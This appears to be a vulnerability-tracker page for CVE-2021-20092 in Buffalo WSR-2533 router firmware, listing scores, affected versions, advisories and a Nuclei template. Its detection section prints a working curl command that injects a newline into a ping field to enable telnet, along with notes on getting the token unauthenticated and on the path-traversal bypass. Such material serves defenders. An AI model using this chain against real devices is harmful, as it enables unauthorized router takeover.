CVE-2021-20092
published 2021-04-29CVE-2021-20092: The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly restrict access to sensitive…
PriorityP276high7.5CVSS 3.1
AVNACLPRNUINSUCHINAN
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
8.17%
94.2th percentile
The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly restrict access to sensitive information from an unauthorized actor.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| buffalo | wsr-2533dhp3-bk_firmware | <= 1.24 | — |
| buffalo | wsr-2533dhpl2-bk_firmware | <= 1.02 | — |
Detection & IOCsextracted from sources · hover to see the quote
commandcurl --include -X POST http://<router>/apply_abstract.cgi -H "Referer: http://<router>/ping.html" --data "action=start_ping&httoken=<token>&submit_button=ping.html&action_params=blink_time%3D5&ARC_ping_ipaddress=%0AARC_SYS_TelnetdEnable=1&ARC_ping_status=0&TMP_Ping_Type=4"↗
yara↗
matchers: word header 'application/x-javascript'; word body '/*DEMO*/' AND 'addCfg('- →The CSRF token parameter is named 'httoken' on Buffalo/Arcadyan devices; it is required for POST requests to /cgi/ endpoints and can be obtained unauthenticated from /loginerror.html via the getToken() JS function. ↗
- →The HTTP Server banner 'Arcadyan httpd 1.0' identifies vulnerable Arcadyan-based firmware across multiple vendor devices. ↗
- →CVE-2021-20091 chained exploit: POST to /apply_abstract.cgi with ARC_ping_ipaddress containing a newline (%0A) and ARC_SYS_TelnetdEnable=1 enables telnet on the device. ↗
- ·CVE-2021-20091 and CVE-2021-20092 have only been confirmed on Buffalo WSR-2533 models, while CVE-2021-20090 (path traversal auth bypass) affects the broader list of Arcadyan-based devices. ↗
- ·To have protected pages load properly through the bypass, proxy match/replace must be used so that all sub-resources also leverage the ..%2f path traversal prefix. ↗
- ·Requests to /cgi/ endpoints will fail if the Referer header itself contains the ..%2f traversal string; the Referer must point to a clean path (e.g., /loginerror.html or /ping.html). ↗
CVSS provenance
nvdv3.17.5HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:P/I:N/A:N
vulncheck7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-cvhf-3qg2-vgjx: The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1
ghsa_unreviewed·2022-05-24
CVE-2021-20092 [HIGH] CWE-200 GHSA-cvhf-3qg2-vgjx: The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1
The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly restrict access to sensitive information from an unauthorized actor.
VulnCheck
buffalo wsr-2533dhpl2-bk_firmware Improper Authentication
vulncheck·2021·CVSS 7.5
CVE-2021-20092 [HIGH] buffalo wsr-2533dhpl2-bk_firmware Improper Authentication
buffalo wsr-2533dhpl2-bk_firmware Improper Authentication
The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly restrict access to sensitive information from an unauthorized actor.
Affected: buffalo wsr-2533dhpl2-bk_firmware
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2025-02-25&host_type=src&vulnerability=cve-2021-20092; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2025-02-26&host_type=src&vulnerability=cve-2021-20092; https://dashboard.shadowserver.org/statistics/honey
No detection rules found.
Nuclei
Buffalo WSR-2533DHPL2 - Improper Access Control
nuclei·CVSS 8.8
CVE-2021-20092 [HIGH] Buffalo WSR-2533DHPL2 - Improper Access Control
Buffalo WSR-2533DHPL2 - Improper Access Control
The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly restrict access to sensitive information from an unauthorized actor.
Template:
id: CVE-2021-20092
info:
name: Buffalo WSR-2533DHPL2 - Improper Access Control
author: gy741,pdteam,parth
severity: high
description: |
The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly restrict access to sensitive information from an unauthorized actor.
impact: |
An attacker can exploit this vulnerability to gain unauthorized access to the router's configuration settings and potentially compromise the entire network.
remediation: |
Apply the latest firmware up
2021-04-29
Published
Exploited in the wild